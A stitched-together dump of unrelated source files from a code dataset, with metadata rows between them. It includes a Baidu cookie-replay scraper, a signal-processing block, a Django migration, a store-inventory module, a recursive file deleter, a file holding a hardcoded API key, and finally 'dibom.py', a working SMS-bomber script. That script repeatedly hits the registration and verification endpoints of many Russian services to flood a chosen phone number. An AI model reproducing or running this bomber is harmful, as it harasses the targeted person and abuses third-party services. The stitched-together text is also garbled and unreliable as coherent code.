# ele_login.click()
#
#
# cookies = driver.get_cookies()
#
# # 把需要获取cookie的域名进行访问,并且将多个域名的cookie进行合并保存
# driver.get('http://passport.baidu.com')
# cookies.extend(driver.get_cookies())
#
# file = 'baidu_cookies_update.txt'
# with open(file, 'w') as f:
# json.dump(cookies, f)
# driver.quit()
# ----------------------------selenium访问百度指数-------------------------------------------------------
# driver.get('http://index.baidu.com/')
# print('aaa')
# time.sleep(2)
# search_box = driver.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div[1]/div/div[2]/form/input[3]')
# search_box.clear()
# search_box.send_keys('汽车排行')
# confirm_button = driver.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div[1]/div/div[2]/div/span/span')
# confirm_button.click()
# driver.quit()
# # ------------------------------requests 读取cookie,登录百度页面--------------------------------------------
def load_cookie(s, file):
with open(file, 'r') as f:
cookies = json.load(f)
jar = RequestsCookieJar()
for cookie in cookies:
jar.set(cookie['name'], cookie['value'])
s.cookies = jar
USER_AGENT_LIST =[
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
]
def make_session():
s = requests.session()
s.trust_env = False
s.verify = False
s.headers = {
'User-Agent': random.choice(USER_AGENT_LIST),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
return s
if __name__ == '__main__':
s = requests.session()
s.trust_env = False
s.verify = False
s.headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
url = 'https://www.baidu.com/'
# r = s.get(url)
#
# if '推荐' in r.text:
# print('登录成功')
# else:
# print('未登录')
file = 'baidu_cookies_update.txt'
load_cookie(s, file)
r = s.get(url)
if '推荐' in r.text:
print('登录成功')
else:
print('未登录')
# ----------------------------request访问百度指数---------------------------------------------------
url = 'http://index.baidu.com/'
params = {
'tpl':'trend',
'word':'汽车排行',
}
s.headers['referer'] = 'http://index.baidu.com/'
r = s.get(url, params=params)
r.encoding='GBK'
if '购买记录' in r.text:
print('访问成功')
print(r.text)
| [
"[email protected]"
] | |
7a7d82fe392ff8a2344e80d9756c966444e238c8 | 6223dc2e5de7921696cb34fb62142fd4a4efe361 | /.metadata/.plugins/org.eclipse.core.resources/.history/ba/4082c82b28630014154bc3193a2d6330 | c36583ab687e3e88509d031ecdd54a0ed18471a8 | [] | no_license | Mushirahmed/python_workspace | 5ef477b2688e8c25b1372f546752501ee53d93e5 | 46e2ed783b17450aba29e4e2df7b656522b2b03b | refs/heads/master | 2021-03-12T19:24:50.598982 | 2015-05-25T10:23:54 | 2015-05-25T10:23:54 | 24,671,376 | 0 | 1 | null | 2015-02-06T09:27:40 | 2014-10-01T08:40:33 | Python | UTF-8 | Python | false | false | 3,833 | #!/usr/bin/env python
#
# Copyright 2014 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import numpy
import copy
#from gnuradio import gr
import gras
class expo(gras.Block):
"""
docstring for block expo
"""
def __init__(self):
gras.Block.__init__(self,
name="expo",
in_sig=[numpy.float32],
out_sig=[numpy.float32])
def set_parameters(self,g,a,b):
self.gama=g
self.alpha=a
self.beta=b
def yield_times(self):
from datetime import date, time, datetime, timedelta
start = datetime.combine(date.today(), time(0, 0))
yield start.strftime("%S")
while True:
start += timedelta(seconds=1)
yield start.strftime("%S")
def work(self, input_items, output_items):
in0 = input_items[0]
out = output_items[0]
tmrg = []
o1 = []
o2 = []
o3 = []
o4 = []
ans = []
gen = self.yield_times()
for ii in range(10):
tmrg.append(gen.next())
print "tmrg :",tmrg
for i1 in range(0,len(tmrg)):
o1.append((self.gama)/(self.alpha*self.beta))
print "o1 : ", o1
for i2 in range(0,len(tmrg)):
o2.append(((self.gama)*(-numpy.exp(self.alpha*i2)))/(self.alpha*(self.beta-self.alpha)))
print "o2 : ",o2
for i3 in range(0,len(tmrg)):
o3.append(((self.gama)*(-numpy.exp(self.beta*i2)))/(self.beta*(self.alpha-self.beta)))
print "o3 : ",o3
ans.append(o1+o2+o3)
print "Final Ans : ",ans
print "Type out : ",type(out)
print "Type ans :",type(ans)
#out = copy.copy(ans)
out[0:1] = ans
print "Output is : " ,out
self.consume(0,1)
self.produce(0,1)
#o2 = -numpy.exp(-2*in0[0:1])
#o3 = -numpy.exp(-3*in0[0:1])
#o2=numpy.exp(-(in0[0:1]*self.alpha))
#print("o2 :",o2)
#o3=numpy.sin((self.freq*in0[0:1])+(self.sigma))
#print("o3 :",o3)
#o4=numpy.sqrt(o1-numpy.square(self.zita))
#print("o4 :",o4)
"""ans = o1-(mul/o4)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
print("Final Value : ",ans)
out[0:1] = ans"""
#o2 = -numpy.exp(-2*tmrg)
#o3 = -numpy.exp(-3*in0[0:1])
#o2 = numpy.exp(-in0[0:1]*self.alpha)
#o3 = numpy.exp(-in0[0:1]*self.beta)
#o4 = numpy.sqrt(1-numpy.square(self.alpha))
#ans = 1-((o2*o3)/o4)
#ans.append(o2)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
#print("Final Value : ",ans)
#out[0:1] = ans
#out = copy.copy(ans)
#self.consume(0,1)
#self.produce(0,1)
#return len(output_items[0])
| [
"[email protected]"
] | ||
5d3ed03203cfe58547c75b642234201ba1430944 | 20dbb407a606997685bf107044cb21f8cf020701 | /todo/migrations/0001_initial.py | 7431c728e1a74144822ef08b194ffd6bd6640703 | [
"MIT"
] | permissive | pyrush/django_deploy | dfb1378823ce064ac236739b2f59230ae7a90968 | a1e09909f46e1fb728c68d87e31d6fb3d75e6fde | refs/heads/main | 2023-07-30T17:59:41.948714 | 2021-10-03T15:11:08 | 2021-10-03T15:11:08 | 413,048,844 | 0 | 0 | MIT | 2021-10-03T11:06:36 | 2021-10-03T10:45:51 | null | UTF-8 | Python | false | false | 493 | py | # Generated by Django 3.2.6 on 2021-08-29 08:43
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TODOModel',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=101)),
],
),
]
| [
"[email protected]"
] | |
304013664f2c33bb46dc50c1e2c543662bc47a42 | 96ea5e2025194823b61e248786cf7b1124cfd40a | /.history/store/store_20180419135458.py | 18098abfadb30b57b4b620843fe2fcc91e1061f8 | [] | no_license | JanBartoszek/ERP | c500c040c4e8d5390ed052d28d68e91af338e71b | b557b6800dd7a3dacf8d78cb729031503149d9d1 | refs/heads/master | 2020-03-11T08:53:20.264464 | 2018-04-19T16:21:08 | 2018-04-19T16:21:08 | 129,895,254 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,413 | py | # data structure:
# id: string
# Unique and random generated (at least 2 special char()expect: ';'), 2 number, 2 lower and 2 upper case letter)
# title: string
# manufacturer: string
# price: number (dollars)
# in_stock: number
# importing everything you need
import os
# User interface module
import ui
# data manager module
import data_manager
# common module
import common
def start_module():
"""
Starts this module and displays its menu.
User can access default special features from here.
User can go back to main menu from here.
Returns:
None
"""
while True:
list_options = ["show_table",
"add",
"remove",
"update",
"get_counts_by_manufacturers",
"get_average_by_manufacturer"]
ui.print_menu("\nStore:\n", list_options, "Back to main")
try:
inputs = ui.get_inputs(["Please enter a number: "], "")
option = inputs[0]
table = data_manager.get_table_from_file('store/games.csv')
if option == "1":
show_table(table)
elif option == "2":
add(table)
elif option == "3":
id_ = ui.get_inputs(["id_"], "Enter record id")[0]
remove(table, id_)
elif option == "4":
id_ = ui.get_inputs(["id_"], "Enter record id")[0]
update(table, id_)
elif option == "5":
result = get_counts_by_manufacturers(table)
label = '\nManufacturers with number of their different titles in shop:\n'
ui.print_result(result, label)
elif option == "6":
manufacturer = ui.get_inputs(["\nPlease enter manufacturer:\n"], "")[0]
result = get_average_by_manufacturer(table, manufacturer)
label = "Average number of games by {} in shop:".format(manufacturer)
ui.print_result(result, label)
elif option == "0":
break
else:
raise KeyError("There is no such option.")
except KeyError as err:
ui.print_error_message(err)
def show_table(table):
"""
Display a table
Args:
table: list of lists to be displayed.
Returns:
None
"""
title_list = ['id_', 'Title', 'manufacturer', 'price', 'in_stock']
ui.print_table(table, title_list)
def add(table):
"""
Asks user for input and adds it into the table.
Args:
table: table to add new record to
Returns:
Table with a new record
"""
labels = ['Title', 'manufacturer', 'price', 'in_stock']
user_inp = common.check_user_inp(labels, 2, 3)
# user_input = ui.get_inputs(['Title', 'manufacturer', 'price', 'in_stock'],"Please provide information")
# while common.is_number(user_input[2]) is False or common.is_number(user_input[3]) is False:
# ui.print_error_message('Error: Price and Stock value must be numbers')
# user_input = ui.get_inputs(['Title', 'manufacturer', 'price', 'in_stock'],"Please provide information")
# continue
new_id = common.generate_random(table)
new_record = [new_id] + user_inp
table += [new_record]
data_manager.write_table_to_file('store/games.csv', table)
return table
def remove(table, id_):
"""
Remove a record with a given id from the table.
Args:
table: table to remove a record from
id_ (str): id of a record to be removed
Returns:
Table without specified record.
"""
for item1 in table:
for item2 in item1:
if item2 == id_:
table.remove(item1)
data_manager.write_table_to_file('store/games.csv', table)
return table
def update(table, id_):
"""
Updates specified record in the table. Ask users for new data.
Args:
table: list in which record should be updated
id_ (str): id of a record to update
Returns:
table with updated record
"""
user_input = ui.get_inputs(['Title', 'manufacturer', 'price', 'in_stock'], "Please provide information")
for item1 in table:
for item2 in item1:
if item2 == id_:
item1[1], item1[2], item1[3], item1[4] = user_input[0], user_input[1], user_input[2], user_input[3]
data_manager.write_table_to_file('store/games.csv', table)
return table
# special functions:
# ------------------
# the question: How many different kinds of game are available of each manufacturer?
# return type: a dictionary with this structure: { [manufacturer] : [count] }
def get_counts_by_manufacturers(table):
manufacturers_dict = {}
for item in table:
if item[2] not in manufacturers_dict:
manufacturers_dict[item[2]] = 1
else:
manufacturers_dict[item[2]] += 1
return manufacturers_dict
# the question: What is the average amount of games in stock of a given manufacturer?
# return type: number
def get_average_by_manufacturer(table, manufacturer):
counter1 = 0
counter2 = 0
for item1 in table:
for item2 in item1:
if item2 == manufacturer:
counter1 += 1
counter2 += int(item1[4])
result = counter2 / counter1
return result
| [
"[email protected]"
] | |
c693e6e5b7b2bb5921e37941401c55cea7d8de59 | 7b14766d7433b3b1099a0df959cab354f75a893b | /DecryptNaN.py | 5519a55e81c71a2545989f2bc10c5ad06e6fd3db | [] | no_license | davidxk/DecryptNaN | 949b839d4bb521a84d77fbfdfcc3e556bb66dc85 | c1dabe06d2ea1a90d87b645e33d38a6b7c088d2c | refs/heads/master | 2021-05-04T11:30:10.855498 | 2017-12-29T11:11:56 | 2017-12-29T11:11:56 | 46,795,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,208 | py | #!/usr/bin/python3
import fileinput
def given_verify(ciphr_0, plain_0, ciphr_3, plain_3):
presumed_key = ciphr_0 ^ plain_0
return ciphr_3 ^ plain_3 == presumed_key
def arrage_key(start, keys):
for i in range( start ):
keys.insert( 0, keys.pop() )
return keys
def decrypt(line):
ciphers = eval( line )
Natural = "Natural"
keys = []
key_len = 3
for i in range( len(ciphers) - key_len ):
for j in range( len(Natural) - key_len ):
if not given_verify( ciphers[i + j], ord( Natural[j] ),
ciphers[i + j + key_len], ord( Natural[j + key_len] ) ):
break
if j == len(Natural) - key_len - 1:
for k in range( key_len ):
keys.append( ciphers[i + k] ^ ord( Natural[ k ] ) )
keys = arrage_key( i, keys)
break
elif( j!=0 ):
i += j - 1
if len(keys) == 0:
print("No 'Natural' word found! ")
#else: print(keys)
for i in range( len(ciphers) ):
plain = ciphers[ i ] ^ keys[ i % 3 ]
print( chr(plain), end = "")
print()
if __name__=="__main__":
for line in fileinput.input():
decrypt(line)
| [
"[email protected]"
] | |
0800911a8ad10d04e48b6389ed205ca42d6a95aa | a090dcc34ace575eed932c573ebbd9cb231acb2e | /av_key.py | d0ed8dc1f3a10013cc1e8b4c14acf02212845040 | [] | no_license | twrule/StocksAI | 23125d48724acba3f5df42b599d36b699eecbec7 | 1a0859c1484b1d3ef7505c9cb2c546923b6f0458 | refs/heads/master | 2021-05-25T23:05:30.386228 | 2020-04-08T01:54:19 | 2020-04-08T01:54:19 | 253,958,457 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27 | py | av_key = 'K0J326KZNCYJH0TS' | [
"[email protected]"
] | |
39428fb9dad862a9a21f5e180b5e449aa8fa84c1 | 759f7993d8b96336d6d19be68deab30e7bd55b55 | /python/func-opdir/delete_dir.py | a7b0dbe5a9b8c887a7fb50368f10172ee26a63f9 | [] | no_license | wyblhx/study | fc13672a8154981615e8c054d76807956d10355b | 42dba01a7a48539cc916908f5b9607ec82bc8781 | refs/heads/master | 2023-01-13T08:48:15.872526 | 2020-11-19T09:43:37 | 2020-11-19T09:43:37 | 304,700,082 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | import os
'''
递归删除文件下的所有文件及目录,如果目标是文件的话,也删除
'''
def delete_dir(target):
# 判断是否为目录
if os.path.isdir(target):
for file in os.listdir(target):
# os.listdir给出当前文件夹下的所有文件及文件夹
path = os.path.join(target, file)
if os.path.isdir(path):
delete_dir(path)
else:
os.remove(path) # 删除文件
else:
os.rmdir(target)
else:
os.remove(target)
dir = os.path.join(os.getcwd(), 'test')
# print(dir)
if os.path.exists(dir):
delete_dir(dir)
else:
print('error')
| [
"[email protected]"
] | |
a021be8a6976430e0f3e878fdbe1bfd54884e888 | 52792ac61b66a4f94245ffb9622a8fcb511f8d63 | /importacao.py | b4bd6972a3a23d6b24e2a64c2253d384597eb867 | [] | no_license | lucassouza252/Financial-analysis | 07f71350ed53037ef7db90020490430da484dd80 | 3d60450738b8f3dd3635bb3f864121c6e4b4457d | refs/heads/main | 2023-06-09T07:20:07.998729 | 2021-06-29T22:53:13 | 2021-06-29T22:53:13 | 375,542,166 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 700 | py | # -*- coding: utf-8 -*-
"""
Importaçao e Organização de Dados
@author: lucas
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pandas_datareader import data as wb
ser = pd.Series(np.random.random(5), name="column 01")
ser
PG = wb.DataReader("PG", data_source="yahoo", start="1995-1-1")
PG.head()
PG.tail()
PG.info()
tickers = ["PG", "MSFT", "T", "F", "GE"]
new_data = pd.DataFrame()
for t in tickers:
new_data[t] = wb.DataReader(t, data_source="yahoo", start="1995-1-1")["Adj Close"]
new_data.head()
new_data.info()
oibr = wb.DataReader("OIBR3.SA", data_source="yahoo", start="2015-1-1")
oibr.head()
plt.plot(oibr["Close"])
plt.plot(oibr["Open"])
plt.show() | [
"[email protected]"
] | |
3541b1cb13351732ae0a10d6dd9c1ed913b043e0 | fa14e529a3615b3f21a9aa1f1de372a8f8709a24 | /batch_optonose_traces.py | a5ad0f15a126b849b622c5c479bcf3e4d07ba786 | [] | no_license | akurnikova/JNP2018 | d960923991dc635ced858cddeabb3d83163b1b82 | 67cb1ba0ecc821856b0df0d4e71793bf13808052 | refs/heads/master | 2021-06-02T13:16:27.938837 | 2020-12-15T20:32:07 | 2020-12-15T20:32:07 | 151,632,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,829 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 12 14:48:15 2018
@author: asya
"""
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
import os
import pandas as pd
import seaborn as sns
import import_data_for_plots
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Arial']
import matplotlib as mpl
mpl.rcParams['pdf.fonttype'] = 42
mouse_list = {'GluReaCh23',
'GluReaCh24',
'GluReaCh25',
'GluReaCh26',
'GluReaCh27',
'GluReaCh28',
'GluReaCh29',
'GluReaCh30',
'GluReaCh31',
'GluReaCh32',
'GluReaCh33',
'GluReaCh34',
'GluReaCh35',
'GluReaCh36',
'GluReaCh37',
'GluReaCh38',
'GluReaCh39',
'GluReaCh41',
'GluReaCh42',
}
cLesion = (1.,0.8,0.)
cLesionNIRT = (0.2,0.8,0.8)
cLess = (0.6,0.3,0.17)
cLeast = (0.1,0.1,0.1)
cControl = (0.7, 0.7, 0.7)
stack_to_color = {'GluReaCh23':cLeast, ###+-+-
'GluReaCh24':cLess, ###+-+-
'GluReaCh25':cLesion, ###++++
'GluReaCh26':cLeast, ###????
'GluReaCh27':cLesion, ###+-+-
'GluReaCh28':cControl, ###NO LESION
'GluReaCh29':cLess,
'GluReaCh30':cLeast,
'GluReaCh31':cLesion, ###++++
'GluReaCh32':cControl, ###NO LESION
'GluReaCh33':cLeast,
'GluReaCh34':cControl, ###NO LESION
'GluReaCh35':cLesion, ###++++
'GluReaCh36':cControl, ###NO LESION
'GluReaCh37':cLeast,
'GluReaCh38':cLesion, ###++++
'GluReaCh39':cControl, ###NO LESION
'GluReaCh41':cLeast,
'GluReaCh42':cLesion, ###+-+-
}
'''
mouse_list = {'GluReaCh24',
'GluReaCh25', #RF
'GluReaCh27', #RF/Rostral IRT
'GluReaCh29', #RF
'GluReaCh31', #IRT
'GluReaCh35', #RF
'GluReaCh38', #IRT
'GluReaCh42', #IRT
}
stack_to_color = {'GluReaCh23':(0.5,0.,1.), ###+-+-
'GluReaCh24':(0.,0.5,1.), ###+-+-
'GluReaCh25':'r',#(1.,0.8,0.), ###+++
'GluReaCh27':'k',#(1.,0.8,0.), ###+-+-
'GluReaCh29':'y',#(1.,0.8,0.),
'GluReaCh31':'b',#(1.,0.3,0.), ###++++
'GluReaCh35':'m',#(1.,0.8,0.), ###++++
'GluReaCh38':'c',#(1.,0.3,0.), ###++++
'GluReaCh42':'g',#(1.,0.3,0.), ###+-+-
}
'''
fig, ax_new = plt.subplots(3,1, sharex=True)
#fig, ax_new = plt.subplots(2,1, sharex=False)
for ms_name in mouse_list:
dfX = get_10ms_dataframes(mouse_name = ms_name)
if len(dfX) == 0: continue
dfX = dfX.reset_index(drop=True)
dfXfilt = dfX.loc[dfX['varLpre']<0.1]
dfXfilt = dfXfilt.reset_index(drop=True)
dfXfilt = dfXfilt.dropna()
i_const =np.abs(dfXfilt['br_rate_at_stim']-dfXfilt['br_rate_at_100ms'])<=0.5
dfXfilt = dfXfilt[i_const]
A = np.vstack(dfXfilt['clipX'].as_matrix())
V = np.vstack(dfXfilt['clipV'].as_matrix())
Br = np.vstack(dfXfilt['clip_br_rate'].as_matrix())
if ms_name == 'GluReaCh26': continue
MN = np.mean(A[:,250:850],0)-np.mean(A[:,450:500])
STDERR = (np.std(A[:,250:850],0))/np.sqrt(A.shape[0])
ax_new[0].plot(np.arange(-250,350),MN, color = stack_to_color[ms_name])
# ax_new[0].fill_between(np.arange(-250,350),MN+STDERR,MN-STDERR, color = stack_to_color[ms_name],alpha = 0.3)
MN_V = np.mean(V[:,250:850],0)-np.mean(V[:,450:500])
STDERR_V = (np.std(V[:,250:850],0))/np.sqrt(V.shape[0])
ax_new[1].plot(np.arange(-250,350),MN_V, color = stack_to_color[ms_name])
# ax_new[1].fill_between(np.arange(-250,350),MN_V+STDERR_V,MN_V-STDERR_V, color = stack_to_color[ms_name],alpha = 0.3)
if ms_name in ['GluReaCh41','GluReaCh32','GluReaCh34']: continue
MN_Br = np.mean(Br[:,250:850],0)
STDERR_Br = (np.std(Br[:,250:850],0))/np.sqrt(Br.shape[0])
ax_new[2].plot(np.arange(-250,350),MN_Br, color = stack_to_color[ms_name])
ax_new[2].fill_between(np.arange(-250,350),MN_Br+STDERR_Br,MN_Br-STDERR_Br, color = stack_to_color[ms_name],alpha = 0.3)
# ax_new[2].scatter(np.mean(Br[:,450:490],0)-np.mean(Br[:,530:570],0),np.mean(A[:,530:570],0)-np.mean(A[:,450:500]),color = stack_to_color[ms_name])
fig_title = '/home/asya/Documents/data/mouse_nose/traces_10ms_stim.pdf'
plt.savefig(fig_title, format='pdf',dpi=fig.dpi)
| [
"[email protected]"
] | |
d6c2f45c35ed1af835382baa6d6f7442fd1656f7 | cd707557631322e60f55fc8c4d4511a7de6ae3ba | /transport_problem.py | a39888a38ad52c16d7042414c046cfda571ad728 | [
"Unlicense"
] | permissive | fjanoos/python | 7ddd1b08110041651e8aa964b72ba87847fa5de3 | d75d6159cbf3c91b1ca3507ee4bc45afc1ab85dc | refs/heads/master | 2020-03-13T03:37:28.194922 | 2018-04-25T03:49:08 | 2018-04-25T03:49:08 | 130,947,508 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 539 | py | #!/usr/bin/python
import argparse
import sys
if __name__ == "__main__":
''' build and solve the transportation problem '''
option_parser = argparse.ArgumentParser(description='Transportation problem')
option_parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=True)
(options, args) = option_parser.parse_args()
if len(args) != 2:
option_parser.print_help()
sys.exit();
startEnumeration(xrange(int(args[0])), int(args[1]));
| [
"[email protected]"
] | |
8af3d0540048f1c5a220756d34986e6df7b3a3d4 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02389/s554583183.py | 44708d73345f1282b250c2bf77474c51419a5e07 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | def rect(a,b):
return a*b, 2*(a+b)
n =input()
x =n.split()
a =int(x[0])
b =int(x[1])
area, perimeter =rect(a,b)
print(area, perimeter)
| [
"[email protected]"
] | |
ee2ae116b190a0242e22da1e7baa15c551b36853 | 270eccc74c24e374186073d84eea9f5d2592f7bc | /dibom.py | b84348dfc1c5a646b528edd16ed3620cd48b7c47 | [] | no_license | Dima-dimaa/dibom | 359117af20c1202afadbd3e4e3c8bb65af8c2b99 | 6902cb63fc7cd03b50cb21e22cce7aeb5404e4d0 | refs/heads/main | 2023-03-26T06:23:32.755965 | 2021-03-10T20:51:51 | 2021-03-10T20:51:51 | 334,630,341 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,448 | py | import requests, time, os, fake_useragent, random
from termcolor import colored
user = fake_useragent.UserAgent().random
headers = {'user_agent': user}
t=0
f=0
gg = 0
if t == 0:
os.system("clear")
banner ="""
_ _ _
| (_) |
__| |_| |__ ___ _ __ ___
/ _` | | '_ \ / _ \| '_ ` _ \
| (_| | | |_) | (_) | | | | | |
\__,_|_|_.__/ \___/|_| |_| |_|
Создатель: Дмитрий Янков"""
x = random.randint(1, 3)
if x == 1:
print(colored(banner, 'magenta'))
if x == 2:
print(colored(banner, 'yellow'))
if x == 3:
print(colored(banner, 'green'))
print('')
phone = input(colored('Введите номер: (Без +) —>', 'magenta'))
if len(phone) == 11:
t = 1
else:
print(colored('Номер введён неверно !!!', 'red'))
os.system("python3 dibom.py")
exit()
if t == 1 or gg == 1:
k = input(colored('Введите количество кругов —>', 'magenta'))
t=2
else:
input(colored('Неверно !!!', 'magenta'))
gg = 1
if t == 2:
f = 0
os.system("clear")
if x == 1:
print(colored(banner, 'magenta'))
if x == 2:
print(colored(banner, 'yellow'))
if x == 3:
print(colored(banner, 'green'))
print('')
try:
if int(k) >= 1:
print(colored('Спам запущен!', 'green'))
while int(k) > f:
f += 1
try:
a = requests.post("https://www.citilink.ru/registration/confirm/phone/+" + phone + "/", headers=headers)
print(colored('citilink-[+]', 'green'))
except:
print(colored('citilink-[-]', 'green'))
try:
a = requests.post("https://u.icq.net/api/v32/rapi/auth/sendCode",
json={"reqId": "91101-1606335718",
"params": {"phone": phone, "language": "ru-RU", "route": "sms",
"devId": "ic1rtwz1s1Hj1O0r", "application": "icq"}}, headers=headers)
print(colored('icq-[+]', 'yellow'))
except:
print(colored('icq-[-]', 'yellow'))
try:
a = requests.post("https://www.dns-shop.ru/auth/auth/fast-authorization/", data={"FastAuthorizationLoginLoadForm[login]" : phone}, headers=headers)
print(colored('dns-shop.ru-[+]', 'magenta'))
except:
print(colored('dns-shop.ru-[-]', 'magenta'))
try:
a = requests.post("https://lenta.com/api/v1/registration/requestValidationCode", json={"phone" : "+" + phone}, headers=headers)
print(colored('lenta.com-[+]', 'blue'))
except:
print(colored('lenta.com-[-]', 'blue'))
try:
a = requests.post("https://taxi.yandex.ru/3.0/auth",
json={"id": "fa137685fd594a9f86f529eec9543e96", "phone": phone}, headers=headers)
print(colored('taxi.yandex-[+]', 'cyan'))
except:
print(colored('taxi.yandex-[-]', 'cyan'))
try:
a = requests.post("https://youla.ru/web-api/auth/request_code",
json={"phone": phone}, headers=headers)
print(colored('youla-[+]', 'magenta'))
except:
print(colored('youla-[-]', 'magenta'))
try:
a = requests.post("https://www.icq.com/smsreg/requestPhoneValidation.php", data={
"msisdn": phone,
"locale": "en",
"countryCode": "ru",
"version": "1",
"k": "ic1rtwz1s1Hj1O0r",
"r": "46763"
}, headers=headers)
print(colored('icq.com-[+]', 'cyan'))
except:
print(colored('icq.com-[-]', 'cyan'))
try:
a = requests.post("https://eda.yandex.ru/api/v1/user/request_authentication_code",
json={"phone_number": phone}, headers=headers)
print(colored('eda.yandex-[+]', 'yellow'))
except:
print(colored('eda.yandex-[-]', 'yellow'))
try:
a = requests.post("https://shop.vsk.ru/ajax/auth/postSms/",
data={"phone": phone}, headers=headers)
print(colored('shop.vsk-[+]', 'green'))
except:
print(colored('shop.vsk-[-]', 'green'))
try:
a = requests.post("https://ok.ru/dk?cmd=AnonymRecoveryStartPhoneLink&st.cmd=anonymRecoveryStartPhoneLink",
data={"st.r.phone": "+" + phone}, headers=headers)
print(colored('ok.ru-[+]', 'blue'))
except:
print(colored('ok.ru-[-]', 'blue'))
try:
a = requests.post("https://nn-card.ru/api/1.0/register",
json={"phone": phone, "password": 'DDd7873456'}, headers=headers)
print(colored('nn-card-[+]', 'cyan'))
except:
print(colored('nn-card-[-]', 'cyan'))
try:
a = requests.post("https://my.modulbank.ru/api/v2/auth/phone",
json={"CellPhone": phone[1:]}, headers=headers)
print(colored('my.modulbank-[+]', 'cyan'))
except:
print(colored('my.modulbank-[-]', 'cyan'))
try:
a = requests.post(
"https://www.tinkoff.ru/api/common/v1/sign_up?origin=web%2Cib5%2Cplatform&sessionid=uRdqKtttiyJYz6ShCqO076kNyTraz7pa.m1-prod-api56&wuid=8604f6d4327bf4ef2fc2b3efb36c8e35",
data={"phone": "+" + phone}, headers=headers)
print(colored('tinkoff-[+]', 'yellow'))
except:
print(colored('tinkoff-[-]', 'yellow'))
try:
a = requests.post("https://sayan.rutaxi.ru/ajax_keycode.html?qip=962358614986707810&lang=ru&source=0",
data={"l": phone[1:]}, headers=headers)
print(colored('rutaxi-[+]', 'green'))
except:
print(colored('rutaxi-[-]', 'green'))
try:
a = requests.post("https://my.modulbank.ru/api/v2/auth/phone",
data={"CellPhone": phone[1:]}, headers=headers)
print(colored('modulbank-[+]', 'magenta'))
except:
print(colored('modulbank-[-]', 'magenta'))
try:
a = requests.post("https://ng-api.webbankir.com/user/v2/create",
json={"lastName": "уцвцу", "firstName": "цувцу", "middleName": "цуацуа",
"mobilePhone": phone, "email": "[email protected]", "smsCode": ""}, headers=headers)
print(colored('webbankir-[+]', 'magenta'))
except:
print(colored('webbankir-[-]', 'magenta'))
try:
a = requests.post("https://stavropol.sushi-market.com/sendForm/callMeBack",
json={"phone": phone[1:], "name": "Егор"}, headers=headers)
